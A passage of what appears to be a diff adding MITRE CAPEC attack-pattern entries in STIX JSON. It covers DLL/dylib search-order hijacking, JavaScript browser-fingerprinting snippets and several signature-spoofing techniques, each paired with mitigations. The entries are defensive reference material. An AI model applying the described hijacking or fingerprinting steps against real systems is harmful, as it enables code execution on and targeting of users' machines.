"2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a weakness in an application's specification of external libraries to exploit the functionality of the loader where the process loading the 
library searches first in the same directory in which the process binary resides and then in other directories. Exploitation of this preferential search order can allow an attacker to make the loading process load the adversary's rogue library rather than the legitimate library. This attack can be leveraged with many different libraries and with many different loading processes. No forensic trails are left in the system's registry or file system that an incorrect library had been loaded.", + "external_references": [ + { + "external_id": "CAPEC-471", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/471.html" + }, + { + "external_id": "CWE-427", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/427.html" + }, + { + "description": "Hijack Execution Flow:DLL search order hijacking", + "external_id": "T1574.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1574/001" + }, + { + "description": "Hijack Execution Flow: Dylib Hijacking", + "external_id": "T1574.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1574/004" + }, + { + "description": "Hijack Execution Flow: Path Interception by Search Order Hijacking", + "external_id": "T1574.008", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1574/008" + }, + { + "description": "M Trends Report, 2011, Mandiant", + "external_id": "REF-409", + "source_name": "reference_from_CAPEC", + "url": "https://www.mandiant.com" + } + ], + "id": "attack-pattern--abdd46ce-dd2d-4430-8032-aa3ee1d262fd", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Search Order Hijacking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--d16af13f-5e0f-4a6b-bc1f-23f733d2229b" + ], + "x_capec_domains": [ + "Software" + ], + 
"x_capec_example_instances": [ + "For instance, an attacker with access to the file system may place a malicious ntshrui.dll in the C:\\Windows directory. This DLL normally resides in the System32 folder. Process explorer.exe which also resides in C:\\Windows, upon trying to load the ntshrui.dll from the System32 folder will actually load the DLL supplied by the attacker simply because of the preferential search order. Since the attacker has placed its malicious ntshrui.dll in the same directory as the loading explorer.exe process, the DLL supplied by the attacker will be found first and thus loaded in lieu of the legitimate DLL. Since explorer.exe is loaded during the boot cycle, the attackers' malware is guaranteed to execute.", + "macOS and OS X use a common method to look for required dynamic libraries (dylib) to load into a program based on search paths. Adversaries can take advantage of ambiguous paths to plant dylibs to gain privilege escalation or persistence. A common method is to see what dylibs an application uses, then plant a malicious version with the same name higher up in the search path. This typically results in the dylib being in the same folder as the application itself. If the program is configured to run at a higher privilege level than the current user, then when the dylib is loaded into the application, the dylib will also run at that elevated level." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify target general susceptibility: An attacker uses an automated tool or manually finds whether the target application uses dynamically linked libraries and the configuration file or look up table (such as Procedure Linkage Table) which contains the entries for dynamically linked libraries.

  2. Techniques
    The attacker uses a tool such as the OSX \"otool\" utility or manually probes whether the target application uses dynamically linked libraries.
    The attacker finds the configuration files containing the entries to the dynamically linked libraries and modifies the entries to point to the malicious libraries the attacker crafted.

Experiment

  1. Craft malicious libraries: The attacker uses knowledge gained in the Explore phase to craft malicious libraries that they will redirect the target to leverage. These malicious libraries could have the same APIs as the legitimate library and additional malicious code.

  2. Techniques
    The attacker monitors the file operations performed by the target application using a tool like dtrace or FileMon. And the attacker can delay the operations by using \"sleep(2)\" and \"usleep()\" to prepare the appropriate conditions for the attack, or make the application perform expansive tasks (large files parsing, etc.) depending on the purpose of the application.

Exploit

  1. Redirect the access to libraries to the malicious libraries: The attacker redirects the target to the malicious libraries they crafted in the Experiment phase. The attacker will be able to force the targeted application to execute arbitrary code when the application attempts to access the legitimate libraries.

  2. Techniques
    The attacker modifies the entries in the configuration files pointing to the malicious libraries they crafted.
    The attacker leverages symlink/timing issues to redirect the target to access the malicious libraries they crafted. See also: CAPEC-132.
    The attacker leverages file search path order issues to redirect the target to access the malicious libraries they crafted. See also: CAPEC-38.
", + "x_capec_prerequisites": [ + "Attacker has a mechanism to place its malicious libraries in the needed location on the file system." + ], + "x_capec_skills_required": { + "Medium": "Ability to create a malicious library." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Fix the Windows loading process to eliminate the preferential search order by looking for DLLs in the precise location where they are expected", + "id": "course-of-action--8ffe2b80-32e7-45af-ae49-9acc5644e178", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-471-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2809e228-142a-488a-a2f7-22b0bdda15e1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8ffe2b80-32e7-45af-ae49-9acc5644e178", + "spec_version": "2.1", + "target_ref": "attack-pattern--abdd46ce-dd2d-4430-8032-aa3ee1d262fd", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Sign system DLLs so that unauthorized DLLs can be detected.", + "id": "course-of-action--92e64bf4-2169-4c6e-85ec-d018c8dd9146", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-471-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + 
"x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--189e08be-aa2a-4fe1-9544-7d387f8d6fd4", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--92e64bf4-2169-4c6e-85ec-d018c8dd9146", + "spec_version": "2.1", + "target_ref": "attack-pattern--abdd46ce-dd2d-4430-8032-aa3ee1d262fd", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker carefully crafts small snippets of Java Script to efficiently detect the type of browser the potential victim is using. Many web-based attacks need prior knowledge of the web browser including the version of browser to ensure successful exploitation of a vulnerability. Having this knowledge allows an attacker to target the victim with attacks that specifically exploit known or zero day weaknesses in the type and version of the browser used by the victim. 
Automating this process via Java Script as a part of the same delivery system used to exploit the browser is considered more efficient as the attacker can supply a browser fingerprinting method and integrate it with exploit code, all contained in Java Script and in response to the same web page request by the browser.", + "external_references": [ + { + "external_id": "CAPEC-472", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/472.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Gareth Heyes, Detecting browsers javascript hacks, The Spanner, 2009--01---29", + "external_id": "REF-410", + "source_name": "reference_from_CAPEC", + "url": "http://www.thespanner.co.uk/2009/01/29/detecting-browsers-javascript-hacks/" + } + ], + "id": "attack-pattern--29e8786c-a791-44c6-b1de-950cf0604643", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Browser Fingerprinting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--e7eec058-4cd9-4fa0-8784-ed961d8d7290" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n The following code snippets can be used to detect various browsers:\n \n Firefox 2/3\n FF=/a/[-1]=='a'\n Firefox 3\n FF3=(function x(){})[-5]=='x'\n Firefox 2\n FF2=(function x(){})[-6]=='x'\n IE\n IE='\\v'=='v'\n Safari\n Saf=/a/.__proto__=='//'\n Chrome\n Chr=/source/.test((/a/.toString+''))\n Opera\n Op=/^function \\(/.test([].sort)\n \n " + ], + "x_capec_prerequisites": [ + "Victim's browser visits a website that contains attacker's Java ScriptJava Script is not disabled in the victim's browser" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": 
"2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Disable Java Script in the browser", + "id": "course-of-action--4f6e0e7b-25c7-423b-bb3e-a652a1fe9285", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-472-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--11ed3172-e4ba-44b6-90f3-93e92247d779", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4f6e0e7b-25c7-423b-bb3e-a652a1fe9285", + "spec_version": "2.1", + "target_ref": "attack-pattern--29e8786c-a791-44c6-b1de-950cf0604643", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker generates a message or datablock that causes the recipient to believe that the message or datablock was generated and cryptographically signed by an authoritative or reputable source, misleading a victim or victim operating system into performing malicious actions.", + "external_references": [ + { + "external_id": "CAPEC-473", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/473.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-327", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/327.html" + }, + { + "external_id": "CWE-290", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/290.html" + }, + { + "description": 
"Masquerading: Invalid Code Signature", + "external_id": "T1036.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1036/001" + }, + { + "description": "Subvert Trust Controls: Code Signing", + "external_id": "T1553.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1553/002" + } + ], + "id": "attack-pattern--d94762c1-3c78-47eb-8212-e0c770ba43a9", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Signature Spoof", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "An attacker provides a victim with a malicious executable disguised as a legitimate executable from an established software by signing the executable with a forged cryptographic key. The victim's operating system attempts to verify the executable by checking the signature, the signature is considered valid, and the attackers' malicious executable runs.", + "An attacker exploits weaknesses in a cryptographic algorithm to that allow a private key for a legitimate software vendor to be reconstructed, attacker-created malicious software is cryptographically signed with the reconstructed key, and is installed by the victim operating system disguised as a legitimate software update from the software vendor." 
+ ], + "x_capec_parent_of_refs": [ + "attack-pattern--138c8405-1295-44b9-b2ed-3b4cd15c2a55", + "attack-pattern--a9d3765f-d7af-4ba2-9396-007d9942240f", + "attack-pattern--9250f041-d55b-4610-aff0-979b5800dc18", + "attack-pattern--72a45548-61df-47c1-a7a0-12e07ec71f37", + "attack-pattern--929e7d9a-b34c-43ad-b58b-b8df918c4f62", + "attack-pattern--a35eb10e-1168-4c77-8f46-87fa6ee40ef7", + "attack-pattern--5b01885b-ebb8-4b72-8314-6fb4729eda47" + ], + "x_capec_prerequisites": [ + "The victim or victim system is dependent upon a cryptographic signature-based verification system for validation of one or more security events or actions.", + "The validation can be bypassed via an attacker-provided signature that makes it appear that the legitimate authoritative or reputable source provided the signature." + ], + "x_capec_skills_required": { + "High": "Technical understanding of how signature verification algorithms work with data and applications" + }, + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker obtains an authoritative or reputable signer's private signature key by theft and then uses this key to forge signatures from the original signer to mislead a victim into performing actions that benefit the attacker.", + "external_references": [ + { + "external_id": "CAPEC-474", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/474.html" + }, + { + "external_id": "CWE-522", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html" + }, + { + "description": "Unsecured Credentials: Private Keys", + "external_id": "T1552.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1552/004" + }, + { + "description": "Sigbjørn Vik, Security breach stopped, 2013--06---26, http://my.opera.com/securitygroup/blog/2013/06/26/opera-infrastructure-attack", + 
"external_id": "REF-411", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Patrick Morley, Bit9 and Our Customers’ Security, 2013--02---08, https://blog.bit9.com/2013/02/08/bit9-and-our-customers-security/", + "external_id": "REF-412", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Brad Arkin, Inappropriate Use of Adobe Code Signing Certificate, 2012--09---27, http://blogs.adobe.com/asset/2012/09/inappropriate-use-of-adobe-code-signing-certificate.html", + "external_id": "REF-413", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--a9d3765f-d7af-4ba2-9396-007d9942240f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Signature Spoofing by Key Theft", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--d94762c1-3c78-47eb-8212-e0c770ba43a9" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "An authoritative or reputable signer is storing their private signature key with insufficient protection." 
+ ], + "x_capec_skills_required": { + "High": "Ability to compromise systems containing sensitive data", + "Low": "Knowledge of common location methods and access methods to sensitive data" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Restrict access to private keys from non-supervisory accounts", + "id": "course-of-action--1a764dd5-94bd-4c75-bef3-01a623dd0d4a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-474-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ed7f5dd6-f7d2-404c-b096-c1b77aec68be", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1a764dd5-94bd-4c75-bef3-01a623dd0d4a", + "spec_version": "2.1", + "target_ref": "attack-pattern--a9d3765f-d7af-4ba2-9396-007d9942240f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Restrict access to administrative personnel and processes only", + "id": "course-of-action--ecc460e4-3af3-4082-8906-0c1f6892992f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-474-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": 
"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--af927d47-9f4f-4c35-abe7-1b27e76baf07", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ecc460e4-3af3-4082-8906-0c1f6892992f", + "spec_version": "2.1", + "target_ref": "attack-pattern--a9d3765f-d7af-4ba2-9396-007d9942240f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure all remote methods are secured", + "id": "course-of-action--4997aedd-dbf7-4903-a4e1-1037632690b8", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-474-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d744a39d-65e1-4dc4-800a-54487a665643", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4997aedd-dbf7-4903-a4e1-1037632690b8", + "spec_version": "2.1", + "target_ref": "attack-pattern--a9d3765f-d7af-4ba2-9396-007d9942240f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure all services are patched and up to date", + "id": "course-of-action--500e5e72-3b87-4258-b3e5-53fce6b4b801", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-474-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": 
"2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3605759e-9ca2-443d-901d-741c0c2033c6", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--500e5e72-3b87-4258-b3e5-53fce6b4b801", + "spec_version": "2.1", + "target_ref": "attack-pattern--a9d3765f-d7af-4ba2-9396-007d9942240f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a cryptographic weakness in the signature verification algorithm implementation to generate a valid signature without knowing the key.", + "external_references": [ + { + "external_id": "CAPEC-475", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/475.html" + }, + { + "external_id": "CWE-347", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/347.html" + }, + { + "external_id": "CWE-327", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/327.html" + }, + { + "external_id": "CWE-295", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/295.html" + }, + { + "description": "Kenn White, Microsoft's Chain of Fools, 2020--01---15, First Principles", + "external_id": "REF-562", + "source_name": "reference_from_CAPEC", + "url": "https://blog.lessonslearned.org/chain-of-fools/" + }, + { + "description": "Patch Critical Cryptographic Vulnerability in Microsoft Windows Clients and Servers, 2020--01---14, National Security Agency (NSA)", + "external_id": "REF-563", + "source_name": "reference_from_CAPEC", + "url": 
"https://media.defense.gov/2020/Jan/14/2002234275/-1/-1/0/CSA-WINDOWS-10-CRYPT-LIB-20190114.PDF" + }, + { + "description": "Thomas Ptacek, Thomas Pornin, Analysis of REF-563, Hacker News", + "external_id": "REF-564", + "source_name": "reference_from_CAPEC", + "url": "https://news.ycombinator.com/item?id=22048619" + } + ], + "id": "attack-pattern--9250f041-d55b-4610-aff0-979b5800dc18", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Signature Spoofing by Improper Validation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--482cb9fc-0122-49f0-b6df-6d2d42098b0a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--d94762c1-3c78-47eb-8212-e0c770ba43a9" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "The Windows CryptoAPI (Crypt32.dll) was shown to be vulnerable to signature spoofing by failing to properly validate Elliptic Curve Cryptography (ECC) certificates. If the CryptoAPI's signature validator allows the specification of a nonstandard base point (G): \"An adversary can create a custom ECDSA certificate with an elliptic curve (ECC) signature that appears to match a known standard curve, like P-256 that includes a public key for an existing known trusted certificate authority, but which was in fact not signed by that certificate authority. Windows checks the public key and other curve parameters, but not the (bespoke adversary-supplied) base point generator (G) parameter constant which actually generated the curve\" [REF-562]. Exploiting this vulnerability allows the adversary to leverage a spoofed certificate to dupe trusted network connections and deliver/execute malicious code, while appearing as legitimately trusted entity [REF-563]. 
This ultimately tricks the victim into believing the malicious website or executable is legitimate and originates from a properly verified source. See also: CVE-2020-0601" + ], + "x_capec_extended_description": "\n Signature verification algorithms are generally used to determine whether a certificate or piece of code (e.g. executable, binary, etc.) possesses a valid signature and can be trusted.\n If the leveraged algorithm confirms that a valid signature exists, it establishes a foundation of trust that is further conveyed to the end-user when interacting with a website or application. However, if the signature verification algorithm improperly validates the signature, either by not validating the signature at all or by failing to fully validate the signature, it could result in an adversary generating a spoofed signature and being classified as a legitimate entity. Successfully exploiting such a weakness could further allow the adversary to reroute users to malicious sites, steals files, activates microphones, records keystrokes and passwords, wipes disks, installs malware, and more.\n ", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Recipient is using a weak cryptographic signature verification algorithm or a weak implementation of a cryptographic signature verification algorithm, or the configuration of the recipient's application accepts the use of keys generated using cryptographically weak signature verification algorithms." 
+ ], + "x_capec_skills_required": { + "High": "Reverse engineering and cryptanalysis of signature verification algorithm implementation" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use programs and products that contain cryptographic elements that have been thoroughly tested for flaws in the signature verification routines.", + "id": "course-of-action--c68612c7-a3bf-4a0e-8416-0cc58982766d", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-475-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ca2272d5-9269-4fa1-9964-f2d6d45c271c", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c68612c7-a3bf-4a0e-8416-0cc58982766d", + "spec_version": "2.1", + "target_ref": "attack-pattern--9250f041-d55b-4610-aff0-979b5800dc18", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker exploits a weakness in the parsing or display code of the recipient software to generate a data blob containing a supposedly valid signature, but the signer's identity is falsely represented, which can lead to the attacker manipulating the recipient software or its victim user to perform compromising actions.", + "external_references": [ + { + "external_id": "CAPEC-476", + "source_name": "capec", + "url": 
"https://capec.mitre.org/data/definitions/476.html" + }, + { + "external_id": "CWE-290", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/290.html" + }, + { + "description": "Eric Johanson, The state of homograph attacks, 2005--02---11, http://www.shmoo.com/idn/homograph.txt", + "external_id": "REF-414", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--72a45548-61df-47c1-a7a0-12e07ec71f37", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Signature Spoofing by Misrepresentation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--d94762c1-3c78-47eb-8212-e0c770ba43a9" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Recipient is using signature verification software that does not clearly indicate potential homographs in the signer identity.Recipient is using signature verification software that contains a parsing vulnerability, or allows control characters in the signer identity field, such that a signature is mistakenly displayed as valid and from a known or authoritative signer." + ], + "x_capec_skills_required": { + "High": "Attacker may be required to create malformed data blobs and know how to insert them in a location that the recipient will visit." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure the application is using parsing and data display techniques that will accurately display control characters, international symbols and markings, and ultimately recognize potential homograph attacks.", + "id": "course-of-action--694ab70c-12fd-45fd-8fa9-0806c5da0396", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-476-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--82379432-2b82-4aca-a835-238f54a057ef", + "modified": "2019-04-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--694ab70c-12fd-45fd-8fa9-0806c5da0396", + "spec_version": "2.1", + "target_ref": "attack-pattern--72a45548-61df-47c1-a7a0-12e07ec71f37", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker exploits the underlying complexity of a data structure that allows for both signed and unsigned content, to cause unsigned data to be processed as though it were signed data.", + "external_references": [ + { + "external_id": "CAPEC-477", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/477.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + }, + { + "external_id": "CWE-311", + "source_name": "cwe", + "url": 
"http://cwe.mitre.org/data/definitions/311.html" + }, + { + "external_id": "CWE-319", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/319.html" + } + ], + "id": "attack-pattern--929e7d9a-b34c-43ad-b58b-b8df918c4f62", + "modified": "2014-06-23T00:00:00.000Z", + "name": "Signature Spoofing by Mixing Signed and Unsigned Content", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--d94762c1-3c78-47eb-8212-e0c770ba43a9" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Signer and recipient are using complex data storage structures that allow for a mix between signed and unsigned data", + "Recipient is using signature verification software that does not maintain separation between signed and unsigned data once the signature has been verified." + ], + "x_capec_skills_required": { + "High": "Attacker must be able to create malformed data blobs and know how to insert them in a location that the recipient will visit." 
